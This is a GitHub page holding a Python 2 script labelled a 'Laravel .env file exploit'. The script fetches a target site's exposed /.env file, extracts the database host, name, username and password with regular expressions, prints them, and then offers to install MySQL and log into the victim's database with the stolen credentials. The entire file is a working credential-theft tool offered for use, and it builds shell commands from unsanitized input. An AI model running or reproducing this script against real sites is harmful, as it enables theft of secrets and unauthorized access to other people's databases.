laravelExploit/laravel.py at master · security007/laravelExploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#!/usr/bin/python


import requests
import re
import sys
import time
import os

banner = """
===================================================
=              LARAVEL .ENV FILE EXPLOIT          =
=          AUTHOR : SECURITY007                   =
===================================================
"""

def exp(host):
	hh = host+"/.env"
	req = requests.get(hh)
	cek_status = req.status_code
	cari = req.text
	if (cek_status == 200):
		print "[+] Vuln"
		time.sleep(1)
		print "[+] Menerima info database"
		time.sleep(1)
		try:
			hostnya = []
			gethost = re.findall("DB_HOST=(.*?)\n",cari)
			getdb = re.findall("DB_DATABASE=(.*?)\n",cari)
			getuser = re.findall("DB_USERNAME=(.*?)\n",cari)
			getpassw = re.findall("DB_PASSWORD=(.*?)\n\n",cari)
			dbhost = gethost[0]
			if (dbhost == "localhost" or dbhost == "127.0.0.1"):
				a = hh.split("/")
				b = a[2]
				e = hostnya.append(b)
			show = """
===================[Database Info]======================
= [Host]     : """+hostnya[0]+"""
= [Database] : """+getdb[0]+"""
= [User]     : """+getuser[0]+"""
= [Password] : """+getpassw[0]+"""
========================================================
		"""

			print show
		except KeyboardInterrupt:
			print req.text

		time.sleep(1)
		konek = raw_input("[+] Mau konek ke mysql server ? [y/n] ")
		if (konek == "y"):
			os.system("sudo apt-get install mysql-server")
			print "\nLogin MySql"
			ip = raw_input("Host : ")
			os.system("mysql -h "+ip+" -D "+getdb[0]+" -P 3306 -u "+getuser[0]+" -p ")
		else:
			print "[-] Bye.."
	else:
		print "[-] Not Vuln"


def main():
	print banner
	if (len(sys.argv) == 2):
		exp(sys.argv[1])
	else:
		print "Usage python "+sys.argv[0]+" http://vuln.com/<path> "

if __name__ == "__main__":
	main()